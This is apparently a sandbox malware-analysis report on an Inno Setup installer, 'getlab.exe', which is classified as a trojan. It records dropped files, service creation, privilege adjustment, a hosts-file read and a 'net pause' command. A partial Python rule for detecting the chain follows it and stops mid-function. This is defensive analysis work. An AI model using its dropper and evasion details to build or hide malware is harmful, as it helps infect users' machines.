                    Source: getlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UJ38T.tmp.1.dr, getlab.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/psU
                    Source: getlab.tmp, 00000001.00000002.2936760839.00000000059A3000.00000004.00001000.00020000.00000000.sdmp, xlgear32.exe, 00000004.00000000.1689308145.00000000004CA000.00000002.00000001.01000000.00000008.sdmp, BridgeGamer.exe.4.dr, is-S3UFM.tmp.1.dr, xlgear32.exe.1.dr | String found in binary or memory: http://www.zldo.narod.ru/plugins.html
                    Source: getlab.exe, 00000000.00000002.2936190021.0000000002261000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676529645.0000000002261000.00000004.00001000.00020000.00000000.sdmp, getlab.exe, 00000000.00000003.1676461165.0000000002490000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000003.1678285601.0000000003110000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2936078014.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, getlab.tmp, 00000001.00000003.1678355074.0000000002168000.00000004.00001000.00020000.00000000.sdmp, getlab.tmp, 00000001.00000002.2936394282.0000000002168000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: is-4GRQU.tmp.1.dr | Binary or memory string: DirectDrawCreateExmemstr_d094a741-8
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0042F518 NtdllDefWindowProc_A, 1_2_0042F518
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00423B7C NtdllDefWindowProc_A, 1_2_00423B7C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00478554 NtdllDefWindowProc_A, 1_2_00478554
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004125D0 NtdllDefWindowProc_A, 1_2_004125D0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004573B4 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_004573B4
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0042E92C: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 1_2_0042E92C
                    Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_004555B8
                    Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_0040840C 0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00480002 1_2_00480002
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004704C8 1_2_004704C8
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004671CC 1_2_004671CC
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004352C0 1_2_004352C0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00486140 1_2_00486140
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00430354 1_2_00430354
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004444C0 1_2_004444C0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004345BC 1_2_004345BC
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00444A68 1_2_00444A68
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00430EE0 1_2_00430EE0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0045EEEC 1_2_0045EEEC
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0045AF94 1_2_0045AF94
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004870A0 1_2_004870A0
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00445160 1_2_00445160
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0046922C 1_2_0046922C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0048D400 1_2_0048D400
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0044556C 1_2_0044556C
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00451990 1_2_00451990
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0043DD48 1_2_0043DD48
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_00401051 4_2_00401051
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_00401C26 4_2_00401C26
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_004070A7 4_2_004070A7
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_609660FA 4_2_609660FA
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6092114F 4_2_6092114F
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6091F2C9 4_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096923E 4_2_6096923E
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6093323D 4_2_6093323D
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6095C314 4_2_6095C314
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60950312 4_2_60950312
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094D33B 4_2_6094D33B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6093B368 4_2_6093B368
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096748C 4_2_6096748C
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6093F42E 4_2_6093F42E
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60954470 4_2_60954470
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_609615FA 4_2_609615FA
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096A5EE 4_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096D6A4 4_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_609606A8 4_2_609606A8
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60932654 4_2_60932654
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60955665 4_2_60955665
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094B7DB 4_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6092F74D 4_2_6092F74D
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60964807 4_2_60964807
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094E9BC 4_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60937929 4_2_60937929
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6093FAD6 4_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6096DAE8 4_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_6094DA3A 4_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60936B27 4_2_60936B27
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60954CF6 4_2_60954CF6
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60950C6B 4_2_60950C6B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60966DF1 4_2_60966DF1
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60963D35 4_2_60963D35
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60909E9C 4_2_60909E9C
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60951E86 4_2_60951E86
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60912E0B 4_2_60912E0B
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_60954FF8 4_2_60954FF8
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DCBF80 4_2_02DCBF80
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DCBF31 4_2_02DCBF31
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DCB4E5 4_2_02DCB4E5
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DAE24D 4_2_02DAE24D
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02D9F07A 4_2_02D9F07A
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DB4EE9 4_2_02DB4EE9
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DB2E74 4_2_02DB2E74
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DAE665 4_2_02DAE665
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DA9F44 4_2_02DA9F44
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DAACFA 4_2_02DAACFA
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DADD59 4_2_02DADD59
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DA8503 4_2_02DA8503
                    Source: Joe Sandbox View | Dropped File: C:\ProgramData\BridgeGamer\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 0040595C appears 116 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 00403400 appears 61 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 00406AB4 appears 41 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 00445DCC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 004344D4 appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 0044609C appears 59 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 00408BFC appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 00457D3C appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 00403494 appears 82 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 004078E4 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 00453318 appears 93 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 00457B30 appears 94 times
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: String function: 00403684 appears 221 times
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: String function: 02DB53F0 appears 139 times
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: String function: 02DA8BA0 appears 37 times
                    Source: getlab.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: getlab.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: getlab.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: getlab.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-UJ38T.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-UJ38T.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-UJ38T.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: sqlite3.dll.4.dr | Static PE information: Number of sections : 19 > 10
                    Source: is-GH467.tmp.1.dr | Static PE information: Number of sections : 19 > 10
                    Source: getlab.exe, 00000000.00000003.1677005829.0000000002268000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs getlab.exe
                    Source: getlab.exe, 00000000.00000003.1676863015.0000000002490000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs getlab.exe
                    Source: getlab.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/31@1/2
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_02DA08C0 FormatMessageA,GetLastError,FormatMessageA,GetLastError, 4_2_02DA08C0
                    Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_004555B8
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_00455DE0 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 1_2_00455DE0
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: CreateServiceA,CloseServiceHandle,CloseServiceHandle, 4_2_00402259
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Code function: 1_2_0046DF04 GetVersion,CoCreateInstance, 1_2_0046DF04
                    Source: C:\Users\user\Desktop\getlab.exe | Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource, 0_2_00409BEC
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | Code function: 4_2_00402253 StartServiceCtrlDispatcherA, 4_2_00402253
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File created: C:\Users\user\AppData\Local\XLGear 3.1.3.157
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03
                    Source: C:\Users\user\Desktop\getlab.exe | File created: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp
                    Source: Yara match | File source: 4.0.xlgear32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000001.00000002.2936760839.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000000.1688736742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\ProgramData\BridgeGamer\BridgeGamer.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\is-S3UFM.tmp, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | File read: C:\Windows\win.ini
                    Source: C:\Users\user\Desktop\getlab.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: xlgear32.exe, xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: xlgear32.exe, xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: xlgear32.exe, xlgear32.exe, 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp, xlgear32.exe, 00000004.00000003.1694654727.0000000000831000.00000004.00000020.00020000.00000000.sdmp, is-GH467.tmp.1.dr, sqlite3.dll.4.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: getlab.exe | ReversingLabs: Detection: 18%
Source: getlab.exe | Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\getlab.exe | File read: C:\Users\user\Desktop\getlab.exe
Source: unknown | Process created: C:\Users\user\Desktop\getlab.exe "C:\Users\user\Desktop\getlab.exe"
Source: C:\Users\user\Desktop\getlab.exe | Process created: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp "C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp" /SL5="$1043E,3351432,54272,C:\Users\user\Desktop\getlab.exe"
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause xl_gear_11293
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp | Process created: C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe "C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe" -i
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause xl_gear_11293
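The process tree above is the actionable part of this block: an Inno Setup stub (getlab.exe) extracts its second stage to %TEMP%\is-BKGL7.tmp\getlab.tmp and hands it the /SL5= argument, and that second stage both runs "net.exe pause xl_gear_11293" (net pause is a service-control command, so the installer is managing a service of that name) and launches the unpacked xlgear32.exe -i from %LOCALAPPDATA%. The SQL strings listed before it are SQLite's own internal statements (VACUUM, FTS and R*Tree schema setup, ALTER TABLE rename helpers) from the bundled sqlite3.dll and only show that the payload ships SQLite. The following is an added example, not part of the Joe Sandbox report: it encodes the chain as a rule over process-creation records. The records are constructed to mirror the report's tree (field names follow Sysmon Event ID 1; the benign control install is invented), and the /SL5= argument on its own is normal Inno Setup behaviour, so the rule only fires on the combination.

```python
import re
from collections import defaultdict

# Inno Setup's stub extracts its second stage to %TEMP%\is-XXXXX.tmp\<name>.tmp
# and passes it /SL5="$hwnd,size,offset,path-to-stub" (benign on its own).
INNO_STAGE2 = re.compile(r"\\is-[a-z0-9]{5}\.tmp\\[^\\]+\.tmp$", re.I)
# "net pause <service>" pauses a running service; captures the service name.
NET_PAUSE = re.compile(r'net1?(?:\.exe)?"?\s+pause\s+(\S+)', re.I)
# An executable the installer placed under %LOCALAPPDATA%, outside Temp.
LOCAL_APPDATA_EXE = re.compile(r"\\AppData\\Local\\(?!Temp\\)[^\\]+\\[^\\]+\.exe$", re.I)

# Constructed sample events modelled on the report's process tree (synthetic,
# not the sandbox's raw log). The second install (pids 200-202) is a benign
# control: an Inno Setup installer that neither pauses a service nor drops
# an executable under %LOCALAPPDATA%.
EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1,
     "Image": r"C:\Users\user\Desktop\getlab.exe",
     "CommandLine": r'"C:\Users\user\Desktop\getlab.exe"'},
    {"ProcessId": 101, "ParentProcessId": 100,
     "Image": r"C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\is-BKGL7.tmp\getlab.tmp" /SL5="$1043E,3351432,54272,C:\Users\user\Desktop\getlab.exe"'},
    {"ProcessId": 102, "ParentProcessId": 101,
     "Image": r"C:\Windows\SysWOW64\net.exe",
     "CommandLine": r'"C:\Windows\system32\net.exe" pause xl_gear_11293'},
    {"ProcessId": 103, "ParentProcessId": 101,
     "Image": r"C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\XLGear 3.1.3.157\xlgear32.exe" -i'},
    {"ProcessId": 200, "ParentProcessId": 1,
     "Image": r"C:\Users\user\Downloads\tool-setup.exe",
     "CommandLine": r'"C:\Users\user\Downloads\tool-setup.exe"'},
    {"ProcessId": 201, "ParentProcessId": 200,
     "Image": r"C:\Users\user\AppData\Local\Temp\is-AB12C.tmp\tool-setup.tmp",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\is-AB12C.tmp\tool-setup.tmp" /SL5="$2A0C4,1000000,54272,C:\Users\user\Downloads\tool-setup.exe"'},
    {"ProcessId": 202, "ParentProcessId": 201,
     "Image": r"C:\Program Files\Tool\tool.exe",
     "CommandLine": r'"C:\Program Files\Tool\tool.exe" --first-run'},
]


def find_installer_chains(events):
    """Return one finding per Inno Setup second stage that both pauses a
    service through net.exe and launches an executable it unpacked under
    %LOCALAPPDATA% outside Temp."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ParentProcessId"]].append(ev)

    findings = []
    for ev in events:
        if not (INNO_STAGE2.search(ev["Image"]) and "/SL5=" in ev["CommandLine"]):
            continue
        paused_service, payloads = None, []
        for child in by_parent[ev["ProcessId"]]:
            image = child["Image"].lower()
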